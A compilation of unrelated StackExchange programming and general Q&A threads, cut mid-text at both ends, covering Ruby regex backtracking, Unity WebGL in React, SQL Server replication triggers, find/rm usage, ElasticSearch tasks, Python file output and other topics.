display renamed file name Write-Host "Renamed to" $new_name # increment counter $int++ } I hope that this is helpful to someone out there. subcan This works for your specific case: ren file?.txt "file? 1.1.txt"
common-pile/stackexchange_filtered
ruby regex hangs I wrote a ruby script to process a large amount of documents and use the following URI to extract URIs from a document's string representation: #Taken from: http://daringfireball.net/2010/07/improved_regex_for_matching_urls URI_REGEX = / ( # Capture 1: entire matched URL (?: [a-z][\w-]+: # URL protocol and colon (?: \/{1,3} # 1-3 slashes | # or [a-z0-9%] # Single letter or digit or '%' ) | # or www\d{0,3}[.] # "www.", "www1.", "www2." … "www999." | # or [a-z0-9.\-]+[.][a-z]{2,4}\/ # looks like domain name followed by a slash ) (?: # One or more: [^\s()<>]+ # Run of non-space, non-()&lt;&gt; | # or \(([^\s()<>]+|(\([^\s()<>]+\)))*\) # balanced parens, up to 2 levels )+ (?: # End with: \(([^\s()<>]+|(\([^\s()<>]+\)))*\) # balanced parens, up to 2 levels | # or [^\s`!()\[\]{};:'".,<>?«»“”‘’] # not a space or one of these punct chars ) )/xi It works pretty well for 99.9 percent of all documents but always hangs up my script when it encounters the following token in of the documents: token = "synsem:local:cat:(subcat:SubMot,adjuncts:Adjs,subj:Subj)," I am using the standard ruby regexp oeprator: token =~ URI_REGEX and I don't get any exception or error message. First I tried to solve the problem encapsulating the regex evaluation into a Timeout::timeoutblock, but this degrades performance to much. Any other ideas on how to solve this problem? Why reinvent the wheel? require 'uri' uri_list = URI.extract("Text containing URIs.") See, that's exactly what I mean. +1 for using the right tool for the job. Your problem is catastrophic backtracking. I just loaded your regex and your test string into RegexBuddy, and it gave up after 1.000.000 iterations of the regex engine (and from the looks of it, it would have gone on for many millions more had it not aborted). The problem arises because some parts of your text can be matched by different parts of your regex (which is horribly complicated and painful to read); it seems that the "One or more:" part of your regex and the "End with:" part struggle over the match (when it's not working), trying out millions of permutations that all fail. It's difficult to suggest a solution without knowing what the rules for matching a URI are (which I don't). All this balancing of parentheses suggests to me that regexes may not be the right tool for the job. Maybe you could break down the problem. First use a simple regex to find everything that looks remotely like a URI, then validate that in a second step (isn't there a URI parser for Ruby of some sort?). Another thing you might be able to do is to prevent the regex engine from backtracking by using atomic groups. If you can change some (?:...) groups into (?>...) groups, that would allow the regex to fail faster by disallowing backtracking into those groups. However, that might change the match and make it fail on occasions where backtracking is necessary to achieve a match at all - so that's not always an option. URI.extract("Text containing URIs.") is the best solution if you only need the URIs. I finally used pat = URI::Parser.new.make_regexp('http')to get the built-in URI parsing regexp and use it in match = str.match(pat, start_pos) to iteratively parse the input text URI by URI. I am doing this because I also need the URI positions in the text and the returned match object gives me this information match.begin(0).
common-pile/stackexchange_filtered
Does randomness help depth? Suppose we have a $RNC^i$ or $BPNC^i$ algorithm for a problem, is it suspected that the problem has an $NC^i$ algorithm or just an $NC^j$ algorithm for some $j\geq i$? Is there any evidence for whether randomness helps or not helps depth akin to evidence for $P=BPP$?
common-pile/stackexchange_filtered
Why is Unity WebGL not working on my React Website? I have been trying to import a Unity game inside of my website using React Unity WebGL. I have looked at many tutorials and videos and I seem to have the right code however, the games do not show up on my website (Images attached of code and website). Does anyone know what I am doing wrong and how I can fix it? [My Game.tsx file which I use in my Game.js file] (https://i.sstatic.net/fWknb.png) [My Game.js file] (https://i.sstatic.net/10dFe.png) Please do not upload images of code/data/errors. Do you get any errors in your developer tools console? @AlexWayne No, do not get any compile errors or anything. As you can see on the website, it works, but the Unity game does not show up. Any advice will be a godsend as I have been trying to get this to work for weeks. You don't create an instance of the game. You should call "createUnityInstance" function from Unity loader script ("Build.loader.js" for your game). To fix this you can use an iframe and load index.html from Unity build package or create your own loader. For example, for loader, you can use Unity minimal WebGL template code: <canvas id="unity-canvas" width=960 height=600 tabindex="-1" style="width: 960px; height: 600px; background: #231F20"></canvas> <script src="Build/html5.loader.js"></script> <script> if (/iPhone|iPad|iPod|Android/i.test(navigator.userAgent)) { // Mobile device style: fill the whole browser client area with the game canvas: var meta = document.createElement('meta'); meta.name = 'viewport'; meta.content = 'width=device-width, height=device-height, initial-scale=1.0, user-scalable=no, shrink-to-fit=yes'; document.getElementsByTagName('head')[0].appendChild(meta); var canvas = document.querySelector("#unity-canvas"); canvas.style.width = "100%"; canvas.style.height = "100%"; canvas.style.position = "fixed"; document.body.style.textAlign = "left"; } createUnityInstance(document.querySelector("#unity-canvas"), { dataUrl: "Build/html5.data", frameworkUrl: "Build/html5.framework.js", codeUrl: "Build/html5.wasm", streamingAssetsUrl: "StreamingAssets", companyName: "Test", productName: "test", productVersion: "0.1", // matchWebGLToCanvasSize: false, // Uncomment this to separately control WebGL canvas render size and DOM element size. // devicePixelRatio: 1, // Uncomment this to override low DPI rendering on high DPI displays. }); </script>
common-pile/stackexchange_filtered
How can I improve this React component with correct lifecycle usage? I am trying to make a list item toggle on and off. So I capture the click event, send a request to my endpoint with PATCH method, get the new value returned from the backend and update the state of the component based on that value. And it works perfectly. But I have the feeling that I might have to use useEffect here in some way. But I can't figure out how to do it. Any suggestions would be much appreciated. import { useState } from 'react'; import { useSelector } from 'react-redux'; export function ListItem({ id, content, checked }) { const token = useSelector(state => state.auth.token); const [isChecked, setIsChecked] = useState(checked); const makeRequest = async () => { const uri = `http://<IP_ADDRESS>:8000/listitems/${id}/`; const h = new Headers(); h.append('Authorization', `Token ${token}`); h.append('Content-Type', 'application/json'); const req = new Request(uri, { method: 'PATCH', headers: h, body: JSON.stringify({ checked: !isChecked }), mode: 'cors' }) const response = await fetch(req); const json = await response.json(); const result = json.checked; return result; } const handleClick = async (e) => { // request the endpoint to check/uncheck the item const result = await makeRequest(); // add/remove the strikethrough class to/from the content setIsChecked(result); } return ( <> <label> <input onChange={handleClick} type="checkbox" name="list-items" checked={isChecked}/> {isChecked ? <s children={content} /> : content} </label> <br/> </> ); } It looks reasonable, though I'd suggest preventing multiple checkbox changes from triggering multiple requests @CertainPerformance May you direct me to a resource where I might read a bit more about how I can achieve that? I'm trying to build a collaborative list, e.g. Google Keep allows multiple users to work on and build a list. So it's important that the database gets updated once someone checks off a list item. Well you probably want to at least disable the checkbox while the request is in-flight. Not sure if it's even needed or not, actually. If makeRequest takes 10 seconds, are you able to trigger multiple handleClicks before the 10 seconds are up? If not, there's nothing to worry about. If so, fix it by calling e.preventDefault inside the handler, or something similar. @CertainPerformance Is preventDefault() useful for checkbox toggles? I thought they only prevent form submission. Outside React, it'd prevent the click from toggling the checkbox.
common-pile/stackexchange_filtered
Transactional replication w/ immediate update - Publisher triggers are firing on immediate update, or not replicating their modifications I have a publisher and multiple subscribers configured for transactional replication with immediate update. I have two replicated tables, MyTable and MyTableHistory. I have a "not for replication" trigger that captures the history of changes to MyTable and places them in the MyTableHistory table. Here is my problem: If I try to place the trigger ONLY on the publisher: When a user updates MyTable on the subscriber, the record is immediately created on the publisher via a distributed transaction and Microsoft's stored procedures and triggers as intended by the "immediate update" type replication. This fires the trigger on the publisher which creates the history record on the publisher as expected. HOWEVER, the history record just created by the trigger is not replicated back out to the subscriber. I'm guessing it's a side effect of them preventing replicating already replicated records back to the subscriber that originated them. If I try to place the trigger on BOTH the publisher and subscribers: When a user updates MyTable on the subscriber, the record is immediately created on the publisher which fires the trigger and results in a duplicate history record. No matter what I've tried, I cannot figure out how to get the trigger to detect that the record is being modified by replication's "immediate update" and so it should abort. I've tried "not for replication" and "sp_check_for_sync_trigger", but I learned that these weren't intended to detect what I'm looking for. I think the first of the two options above are preferred, but at this point, I'm open to any approach that will make one of the two options above work. Any ideas? Thanks! I'm not sure you'll get an answer here, as Updatable Subscriptions for Transactional Replication were deprecated with SQL 2008. Making you probably now one of the world's foremost experts on them :) The best solution I found was to place the triggers on both publisher and subscribers, and include the following code in the trigger to bail under certain conditions to avoid the trigger from firing during replication maintenance. It requires the following three approaches: not for replication trigger option - Prevents the subscriber trigger from firing when a record is replicated from the publisher to subscribers spGetLastCommand - This is a signed stored procedure I created with view server state permission. It returns the last command so we can check if it was the replication stored procedure run on the publisher so we can prevent the publisher trigger from firing when the subscriber changes cause an immediate update to the publisher. sp_check_for_sync_trigger - This code prevents the trigger from firing when an update statement is issued while the replication stored procedures are trying to update the ms_repl_tran column. Hope that helps someone. But probably not since we're the last ones on the planet using this type of replication ;) declare @last_command nvarchar(512) exec master..spGetLastCommand @last_command output if @last_command like '%sp_MSsync_%_MyTable_1%' begin return end declare @table_id int = object_id('MyTable') declare @trigger_op varchar(max) declare @retcode int exec @retcode = sp_check_for_sync_trigger @table_id, @trigger_op output, @fonpublisher=1 if @retcode = 1 begin return end exec @retcode = sp_check_for_sync_trigger @table_id, @trigger_op output, @fonpublisher=0 if @retcode = 1 begin return end";
common-pile/stackexchange_filtered
Science museum planetarium, late afternoon exhibit on cosmic ice formation. Look at this display about ice in space. It says dust grains in molecular clouds get coated with frozen water and other molecules when temperatures drop to 10 Kelvin. That's incredibly cold. But what's interesting is how those ice layers aren't just sitting there doing nothing. When cosmic rays hit them, they trigger chemical reactions that wouldn't happen otherwise. Right, the radiation breaks molecular bonds and creates reactive fragments. So you'd start with simple molecules like water, methane, and ammonia all frozen together on a grain surface. Exactly. And those fragments can recombine in new ways while they're trapped in the solid ice matrix. The cold temperature keeps everything locked in place, but the radiation provides the energy needed for chemistry to happen. That's brilliant - it's like having a natural laboratory where you can force molecules together that would never meet under normal conditions. The ice acts as both a concentrator and a cage. And here's what really gets me - when they recreate these conditions in actual laboratories, bombarding ice mixtures with radiation, they find amino acids forming. The same building blocks that make up proteins in living things. So you're saying that the amino acids found in meteorites might have formed this way? Through radiation chemistry in interstellar ice before our solar system even existed? That's the compelling part. These aren't just random organic compounds - they're specifically the types of molecules that life depends on. It suggests there's a natural pathway from simple ices in space to the complex chemistry that could eventually lead to biology. The process is almost inevitable then. Wherever you have cold dust, simple molecules, and radiation - which is basically everywhere in space - you get this ice chemistry happening. And the implications are huge. If amino acid formation is this straightforward in cosmic ices, then the raw materials for life might be distributed throughout the galaxy, just waiting for the right conditions to assemble into something more complex. It makes you wonder how many worlds out there started with the same chemical foundation that we did.
sci-datasets/scilogues
Increase in Memory usage without leak? I have a program that CRTDBG reports as having no leaks, yet, according to Windows Task Manager takes up more memory as time goes on. Even worse is that given enough time, it will crash with exit code -1. This is a program that's going to be a game engine, right now I'm testing the functions that will unload the level by making it rapidly load and unload levels. This appears to be working, otherwise the entities from the 'last' level would bump into the current ones. The memory doesn't increase when I run the program 'normally' and load one level without unloading until exiting. It may be of note that loading a level involves reading from the hard drive and opening a file. It might also be important to know that I'm using the Chipmunk physics library, Lua, and OpenGL. The thing that's making this the most tricky is how CRTDBG won't dump, and it returns 0 at the end of main(). EDIT: Also, using Visual Studio 2008. Blaming the tool doesn't usually get you anywhere. Proof it, intentionally leak memory and verify that it gets reported. If that checks out, you'll need to analyze your program to figure out why it is holding on to data for too long. Well, sticking a 'new' or a 'malloc' in the beginning of main(). So it's may be some sort of auto collect, CRTDBG not working, or I didn't implement it right. To me it sounds like you are not really leaking memory, just allocating a lot of it and then freeing it up at the exit. Perhaps you are holding on to some list of objects that you forget to free/delete between the loading of each level ? Lua's garbage collector collects when it feels like it. If you're not explicitly ordering Lua to do a collection, then memory may build up there without being actually used. Forcing the garbage collector at the same frequency as the level loads doesn't stop it. It may be that you're observing the effects of a "smart" allocator that asks the OS for big chunks of memory and suballocates. You might check by replacing the global operator new and operator delete. If those tell you that all allocated memory is also deallocated, and yet the process' memory consumption goes up or stays up there, then it's (most probably) the allocator.
common-pile/stackexchange_filtered
How can I speed up the local server startup time of my Meteor app? I'm contributing design visual design changes to a Meteor app and I need to make changes and see them in the browser. Only problem is that the app takes minutes to display on localhost. It reminds me of the time it takes a free herokuapp to wake up, only longer. Any idea what might be making it slow? Is this a problem that is common to Meteor apps? Note: The dev team has profiled the app but there is some hidden wait time not reflected in the profile Normally it's pretty fast - like seconds, not minutes. @MichelFloyd I'm going to take that as a good sign that we have a fixable problem. ...but I guess that makes it hard to guess what the problem is. hmm.... When Meteor rebuilds the app after a change, you'll see a bunch of messages in the console where you started it. Which one(s) seem to take a very long time? I suggest to start debugging with enabling profiler, via export METEOR_PROFILE=1 speed based on used packages and scripts. you should debug where is the slower perfomance. meteor totally almost very fast. If you just change the CSS, I don't think you should expect to have to noticeably wait at all. So you may want to try and focus on big template changes (What are you using? React, Blaze, Angular?) in single steps and then make incremental CSS changes. @Hans you make a good point about CSS changes not being that painful, but I'm also updating strings, etc. Still not that painful. ...but it's mainly that I see the development team having a lot of their time wasted by the server start time. We are using React with a bazillion packages because the app is built on top of an existing app and the feature scope is pretty big. @pixelfairy Almost all web tools I've worked with take their sweet time to restart after a file change and Meteor has never struck me as being on the painful side, so it may be the complexity of your project, that is the issue here. Can you post a list of all the packages you are using (meteor list)? A beginner mistake I did was to run test if demo data was setup and if data migrations existed every single time the server restarted, which obviously can take its toll as your data increases.
common-pile/stackexchange_filtered
Minimal polynomial of an algebraic element We have to determine minimal polynomial over $\mathbb Q$ of element $1+2^\frac{1}{3}+4^\frac{1}{3}$. Here is my work, please tell me where is the mistake: We want polynomial with rational coefficients so: $x = 1+2^\frac{1}{3}+4^\frac{1}{3}$, as $2^\frac{1}{3}-1$ is not zero, we can multiply both sides with that to get: $(2^\frac{1}{3}-1) x = 1$ so $2^\frac{1}{3} x = x + 1$ which now we can multiply three times with himself getting: $2 x^3 = x^3 + 3 x^2 + 3 x + 1$ which is $x^3 - 3 x^2 - 3 x - 1 = 0$. As 1 and -1 are the only candidates for rational zeroes, we see that this is irreducible over $Q$, so, this shall be minimal polynomial. The problem is : they get $x^3-6 x- 6$ and that is correct.... So, I am wondering where I made a mistake, not how they came to their solution. $x^3-6x-6$ is the minpoly of $2^{1/3}+4^{1/3}$, not $1+2^{1/3}+4^{1/3}$. Your reasoning is correct 100%, and they made a mistake because $X^3-6X-6$ is the minimal polynomial for $x-1$ not $x$ Thanks a lot, helped me.... I closed this as a duplicate even though I answered the target. This was because there were no other answers. But, to tell you the truth, I was looking for duplicates of this, found both of these, acted, and only then realized that I have answered the older one. If I would remember...
common-pile/stackexchange_filtered
iOS: Embed Table View in other View (but table view has a complex table view controller..) I'm struggling with this problem, so I need your help. Basically I've programmed a complex table view controller (with NSFetchedResults protocol etc) and already used it in my app and it worked great. Since I want now exactly this table view inside another view (so I can add a small subview at the bottom of the screen), I'm really struggling how to do this! I know by know how to embed a simple table view inside another view and link it to it's view controller. But how can I do this in my case with as little effort as possible? I mean can I somehow use this table view controller I already have even though the superview must have its own view controller?! And how would I do that? Sorry I'm still a beginner :) Since you already have a TableViewController. To add it as an subview to another ViewController's (self) view, do this: TVC = <your tableViewController instance>; [self addChildViewController:TVC]; TVC.view.frame = <your desired frame>; [self.view addSubview:TVC.view]; adding the TVC as childViewController will forward UI methods of 'self' like willAppear and all to TVC. Hi Thanks a lot. But what I don't yet understand is this TVC.view.frame = your desired frame. I've layed out the layout in Xcode so what exactly would that frame be? if you have layed it out using XIB, then no need to set frame. Go to XIB and take a tableViewController Object. Set the tableViewCOntroller objects file owner as your custom tableViewcontroller class, by changing the class name in identity inspector (3rd button from left, in right pane) then add the tableView you added to this TableViewController's view. and set the delegate and datasource accordingly. Sorry I still don't understand 100% :-( Let's put it that way: So far I have a complex TableViewController. As far as I understand (and did so far) I selected a normal ViewController and gave its view two subviews. A normal view and a table view. But from here on I don't get it. I subclassed a normal view controller for the top view controller in order to set all the necessary connections for the subviews. But now I'm stuck…I mean in a normal table view controller I don't need to set delegate and data source, but what do I do here actually?! No idea what code to put in the top view controller. A normal tableViewController already has the dataSource and delegate connected. After the point where you have added those two subviews. take a tabviewcontroller object. and connect its view outlet to the tableview (2nd Subview), and for that tab;eView (go to connection inspector, the last button) and connect those two data source and delegate accordingly i.e, to the class where you will be writing the cellforRow and other such methods. Most Probably to the newly added tableViewController object. Thanks again for your help! Current situation: I've changed this complex table view controller to have an IBOutlet for a tableview and instead uf subclassing tableviewcontroller, it implements both tableview protocols My new super view controller inherits from this new CoreDataViewController and I've set the tableView Outlet to the embedded table view and from this tableview the data source and delegate to the super view controller. Now my data gets displayed. However, it doesn't go to edit mode (which worked before)…any idea why? did I hookup something wrong? assuming that your data is getting displayed properly, didselect method is getting called when u tap on the cell and all other normal tableview methods. Check whether you have implemented canEditRowAtIndexPath delegate method in your delegate class to return YES.
common-pile/stackexchange_filtered
how to register asphttp.conn component I need to do enhancements to an classic asp application which uses AspHTTP.Conn. I am trying to set the application on my system. I have the dll, but not sure how to install and set up it on my system. Can you please help with the steps to register the AspHTTP dll on my system. what version of OS you have? 32bit or 64bit? what version of IIS you have? it is windows 7 OS 64 bit with IIS 7.5 version Did you check AspHTTP dll documentation? http://www.serverobjects.com/comp/asphttp3.htm Never mind. Answer is: Steps could be vary, depending on library (sorry, i never used before AspHTTP dll) and on version of IIS and of course version of Operation System. In general steps for any library are Step 0) find proper folder where you going to store your DLL. if DLL required only for 1 web site (let's say for "Web01" web site only), I usually keep them in folder like "X:\InetPub\Web01\Dll\" Step 1) regsvr32 YourDLL.EXE if you have 64 bit OS and 32 bit library (DLL) then you should run C:\Windows\SysWOW64\regsvr32.exe. if you have 64 bit OS and 64 bit library (DLL) then you should run C:\Windows\System32\regsvr32.exe. Step 2) depending on folder, where you store your DLL. if you store DLL in Windows\systemXX folder, then may be you should skip this step. Otherwise perhaps will be needed to add read & execute permission to this DLL file for user which are running your web site or application pool -- it's depending on IIS version you are using and authentication way you are using for your web site. (i always create separated users. so, for my "Web01" web site user name will be like "IUSR_Web01". Step 3) perhaps in IIS (in IIS 6.0) will be required to add this DLL to "Web Service Extension" with Status = Allowed.
common-pile/stackexchange_filtered
Wargame payload segfaults when used as such I am currently trying to complete Level5 of the io.netgarage.org wargame. To complete it i wrote the following asm payload: global _start section .text _start: xor eax, eax push eax push 0x68732f6e push 0x69622f2f mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 which should spawn a shell by calling sys_execve, and it does. But only as long, as i don't use it as actuall payload. As soon as i try to feed it to the vulnerable c programm, i get segfaulted. By inspecting it with gdb, i was able to pin the segfault to the line mov edx, esp Everything that should happen before (overwriting return address, NOP-Sled) actually works as intendet. Additional Information: - I get to OP-Codes by compiling above asm code with nasm -f elf32 file.asm -o file.o objdump -d file.o - I call the vulnerable programm like this: /levels/level05 $(python -c 'print "\x90"*115 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\xa0\xfb\xff\xbf"') - The return address 0xbffffba0 i got by inspecting the values of the stack with gdb - My current assumption is that it has to do something with the stack, because using a script i found online, utilizing a jmp-call-pop pattern, worked seemingly correctly Thank you, tarkes mov edx, esp can not fault, you used gdb wrong. Unless the code is in non-executable memory, but you claim that is not the case. PS: nasm can produce a listing, you don't need to objdump @Jester You are right, while the view i get when using layout asm shows me on the corresponding address is the instruction mov edx, esp examining the instruction pointer and/or the address directly gives me add ch, edi... Where does the discrepany come from? add ch, edi doesn't even exist... @Jester Amazing, huh? Thank you, i found the problem now, i overwrite my shellcode by pushing on the stack. I am sorry if this was a stupid question.
common-pile/stackexchange_filtered
Why is this command exploding So I got this as an answer to a previous question as an answer for looking recursively through files in a directory and deleting the files and directories if found: find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -exec rm -rf "{}" \; There are two problems with this: One: find: `./adam.balan/AisisAjax/.git': No such file or directory because of this error the rest of the script doesn't execute. Now I don't want to have to check for any of the files or folders. I don't care if they exist or not, I want to suppress the error on this. The second is that I am also getting the error on a directory that needs to be excluded from this search: vendor/ find: `./vendor/adam.balan/AisisAjax/.git': No such file or directory I do not want it searching vendor. I want it to leave vendor alone. How do I solve these two problems? Suppression and ignoring. The problem is that you're deleting a directory that find then tries to descend into. You can use -prune to prevent that: find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \; To ignore all errors, you can use 2> /dev/null to squash the error messages, and || true to avoid set -e making your script exit: find \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \; 2> /dev/null || true Finally, to avoid descending any directory named 'vendor', you can use -prune again: find -name vendor -prune -o \( -name ".git" -o -name ".gitignore" -o -name "Documentation" \) -prune -exec rm -rf "{}" \; 2> /dev/null || true
common-pile/stackexchange_filtered
What is the correct way to express a number with all its digits? I have the following table: On the last column, I have expressed the numbers in billions as it is mentioned at the top. However, I want the last number (Final sample size) to be expressed fully. Is there a way that I can be specific about the fact that this is the full number and not rounded up in billions? Thank you! I'm probably missing something obvious, but isn't that last sum 205 million rather than billion? In addition to the comment from @SConroy, I find the number shown for the final total quite confusing: it is still in a column headed "(in billions)", which (according to your description) is not correct. If the final total is in different units from that shown at the top of the column, then the description at the left of that row should be amplified. @TrevorD That is what I am looking for. As I have said, the column until the final cell I have expressed in billions, and I am looking for a way to suggest that the final number is the full or exact number (Exactly what you are suggesting) But you still haven't addressed the issue raised by @SConroy that there is inconsistency as to whether your final total is in millions or billions! @TrevorD ah sorry! The final number is expressed in all digits. It is 205 millions 813 thousands 022 How can the grand total be 205+ million, when the first item listed in the column is 26.5 billion, & the second item in the column is 6.01 billion? That is the final sample size after all the filters. After filter number 7, there 205,813,022 observations left. It is not the sum of the steps I still don't understand the table! If you start with 26.5 billion, and then subtract the figures given in the final column, you are still left with 9.71 billion! So I don't understand the table. In any case, if the number shown at the bottom is a remainder - not a total - then surely the last line should say "Remaining sample size", not "Final sample size"? I'm voting to close this Q. because it's 'Not clear what you are asking'. @TrevorD You start with the raw sample and then after you apply each filter, you are left with a number of observations. There is more information about this table in it's title in my document. Where it is explained how to look at each step. That was not my question. I was merely asking how to express a number not rounded up or down in any way. I agree with your suggestion about changing to the remaining sample size, but the other stuff... does not matter in my opinion, because it is not what I asked On this site, it is not unusual for the underlying Q. not to be immediately apparent from the Q. as asked. Therefore, I (& others) sometimes take the view that we are not prepared to offer an answer without being sure that we fully understand what is being presented to us. In that respect - & as previously pointed out - your final figure shows a number in millions, but was in a column headed "billions" and is referred to in the last word of your Q. as "billions". Therefore I was not prepared to offer an answer about how to refer to the final 'value' until I understood it's actual value. I also refer you to the comments from @JasonBassford below the accepted answer - and which postdate your last reply to me - that "the table is unclear and should be reformatted. (Personally, I'd remove the final cell from the table altogether and express it separately.)" Let us continue this discussion in chat. The most common word for a number that is not rounded up or down, nor approximated in any way is "exact". The fact that the number is without a decimal and expressed to nine significant figures should be enough for most people to realize it is the exact number, but you can indicate it specifically if you like. Also note that, despite the comments under the question, the final cell is not necessarily part of the existing columns. It only appears to be because it is underneath all of the other rows that are underneath the headings. But by making it a single cell, it could easily be seen as not following those headings. After all, final sample size is not a filtering step, so the number shouldn't have to be # of obs. (in billions) either. It just means that the table is unclear and should be reformatted. (Personally, I'd remove the final cell from the table altogether and express it separately.)
common-pile/stackexchange_filtered
ElasticSearch don't return "deletebyquery" task when I query list of tasks I'm using ElasticSearch 7.1.1 and use delete_by_query API to remove required documents asynchronously. As result that query return to me task id. When I execute next query: GET {elasticsearch_cluster_url}/_tasks/{taskId} I'm able to get correspond document for the task. But when I try to execute such query: GET {elasticsearch_cluster_url}/_tasks?detailed=true&actions=*/delete/byquery I don't see my task in the result list. I also tried to execute such query: GET {elasticsearch_cluster_url}/_tasks And I got such response: { "nodes": { "hWZQF7w_Rs6_ZRDZkGpSwQ": { "name": "0d5027c3ae6f0bb0105dcdb04470af43", "roles": [ "master" , "data" , "ingest" ], "tasks": { "hWZQF7w_Rs6_ZRDZkGpSwQ:194259297": { "node": "hWZQF7w_Rs6_ZRDZkGpSwQ", "id": 194259297, "type": "transport", "action": "cluster:monitor/tasks/lists", "start_time_in_millis":<PHONE_NUMBER>682, "running_time_in_nanos": 214507, "cancellable": false, "headers": { } }, "hWZQF7w_Rs6_ZRDZkGpSwQ:194259298": { "node": "hWZQF7w_Rs6_ZRDZkGpSwQ", "id": 194259298, "type": "direct", "action": "cluster:monitor/tasks/lists[n]", "start_time_in_millis":<PHONE_NUMBER>682, "running_time_in_nanos": 84696, "cancellable": false, "parent_task_id": "hWZQF7w_Rs6_ZRDZkGlDwQ:194259297", "headers": { } } } } } } I'm not sure, maybe that query returns the tasks only from one cluster's node that accepted the query? Why my task is missed in the last query? Is there some mistake in my query parameters? Can you try *byquery instead of */delete/byquery? @Val actually I tried it, but also couldn't to get my task in response. Can you show the full response you get from GET _tasks ? @Val I used such query: GET {es_url}/_tasks/?detailed=true&actions=*byquery. I'll add response to the post No just GET _tasks please If your delete by query call is very short-lived, you're not going to see it in _tasks after the query has run. If you want to keep a trace of your calls, you need to add ?wait_for_completion=false to your call. While the query is running, you're going to see it using GET _tasks, however, when the query has finished running, you won't see it anymore using GET _tasks, but GET .tasks/_search instead. After it's done running and you have specified wait_for_completion=false, you can see the details of your finished task with GET .tasks/task/<task-id> I use 'wait_for_completion=false' and I'm able to get task using 'GET .tasks/task/', but can I get the list of all such my tasks filtering by 'deletebyquery' action type? My initial question about that If you're able to get GET .tasks/task/<task-id> it means the task is finished, so it won't show up using GET _tasks anymore. You can catch them using GET _tasks?actions=*byquery&detailed only while they are running thank you for the clarification, it helped me to figure out how to do what I wanted in the another way :)
common-pile/stackexchange_filtered
Screen tear or I don't know what to call it when using chrome I rarely posts question but well this has been bugging me since i started using Ubuntu 14.04, of course previously I was using Win8.1 without any issues. My screen has a tear when using chrome which looks like dead pixels or what seemed to be tearing when I minimize and maximize back and it actually shifts the screen a little to the right. Sometimes I even have to click a little to the left to be accurate at clicking things. Here's a screenshot, you could see it clearly vertically down right beside the launcher/docker:
common-pile/stackexchange_filtered
Koi or goldfish? How to differentiate between a koi and a goldfish? As far as I know, both are carp. So is it a big goldfish or a small koi? http://fishgirlwrites.blogspot.com/2012/11/differences-between-goldfish-and-koi.html your picture show koi,goldfish have a shorter body and no barbels and the underside of the jaw is more rounded in goldfish,the information is easy to find online so i post this as a comment not an answer. Koi generally have much larger price tags too.
common-pile/stackexchange_filtered
Writing into text file as tab separated columns in Python I have two lists A = ["ATTTGTA", "ATTTGTA", "ATTTGTA", "ATTTGTA"] A_modified = ["ATTGTA", "AAAT", "TTTA"] I want an output tab separated txt file looking like ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA I tried the following piece of code but it does not write o/p in two columns, just as new rows each time with open ('processed_seq.txt','a') as proc_seqf: proc_seqf.write(A) proc_seqf.write("\t") proc_seqf.write(A_modified) This is the output I get ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA I suggest using the csv module. . write() adds a newline. Just omit it. proc_seqf.write("%s\t%s" % (A, A_modified)) might also work as a replacement for all of your write() lines, but using zip is probably the best way to get it organized in a meaningful way first, then follow mihai's answer I realised this is happening due to the following problem: each of the lists look like A = ["ATTTGTA\n", "ATTTGTA\n",..] and that is why the new line gets added. Can you tell me how to get rid of the \n at the end. thanks Just found using str.strip on the strings after reading them from the text file and before creating the string solved all my problems.Thanks You just need to pair the elements in the two list. You can do that using the zip function: with open ('processed_seq.txt','a') as proc_seqf: for a, am in zip(A, A_modified): proc_seqf.write("{}\t{}".format(a, am)) I have also used format (see specs) to format the string to get everything in a single line. What about something like this? It provides you with some flexibility in input and output.. lines = [ ['a', 'e', '7', '3'], ['b', 'f', '1', '5'], ['c', 'g', '2', '10'], ['d', 'h', '1', '14'], ] def my_print( lns, spacing = 3 ): widths = [max(len(value) for value in column) + spacing for column in zip(*lines)] proc_seqf = open('processed_seq.txt','a') for line in lns: pretty = ''.join('%-*s' % item for item in zip(widths, line)) print(pretty) # debugging print proc_seqf.write(pretty + '\n') return my_print( lines ) I added the option that the user can decide the size of the spacing.. To match with your example data: A = ["ATTTGTA", "ATTTGTA", "ATTTGTA", "ATTTGTA"] A_modified = ["ATTGTA", "AAAT", "TTTA"] lines = [ A, A_modified ] If your lists are huge ,i suggest use itertools.cycle() : import itertools ac=itertools.cycle(A) a_mc=itertools.cycle(A_modified) with open ('processed_seq.txt','a') as proc_seqf: for i in A_modified: proc_seqf.write("{}\t{}".format(ac.next(), a_mc.next())) Apart from other great answers, as an alternative with try/except it will write all remaining elements in the list if their lengths are different (at least in your sample): with open ('processed_seq.txt','w') as proc_seqf: for each in range(max(len(A), len(A_modified))): try: proc_seqf.write("{}\t{}\n".format(A[each], A_modified[each])) except IndexError: if len(A) > len(A_modified): proc_seqf.write("{}\t\n".format(A[each])) else: proc_seqf.write("\t{}\n".format(A_modified[each])) cat processed_seq.txt ATTTGTA ATTGTA ATTTGTA AAAT ATTTGTA TTTA ATTTGTA
common-pile/stackexchange_filtered
Uses classes to open an excel csv file and return values based of the maximum weight in a specific column Ive been given this Class file that contains functions: import csv import warnings from datetime import date conv_fn = { 'name': str, 'country': str, 'operator': str, 'users': str, 'purpose': str, 'perigee': float, 'apogee': float, 'eccentricity': float, 'launch_mass': float, 'date_of_launch': date.fromisoformat, 'expected_lifetime': float } def warn_caller(message: str, category=None, stacklevel=3): """Wrapper around UserWarning that has stacklevel of 3""" warnings.warn(message, category, stacklevel) def simple_format(message, category, filename, lineno, line=None): if line is None: import linecache line = linecache.getline(filename, lineno).strip() return ( "SatDB Warning:\n" f" File: \"{filename}\", line {lineno}\n {line}" f"\n{category.__name__}: {message}\n" ) warnings.formatwarning = simple_format # NOTE: For testing, use warnings.simplefilter("ignore") class SatDB(object): """Class to provide interaction with a satellite database. Methods ------- get_number_of_satellites get_sat_data add_field_of_data """ def __init__(self, filename): """Construct a SatDB object. Parameters ---------- filename : string A CSV file with data for satellites. """ with open(filename, 'r') as sat_csv_file: data_list = list(csv.reader(sat_csv_file, delimiter=',')) # parse header to get fields in data file self._fields = data_list[0].copy() self._fields.pop() # remove trailing empty field # assemble data as list of 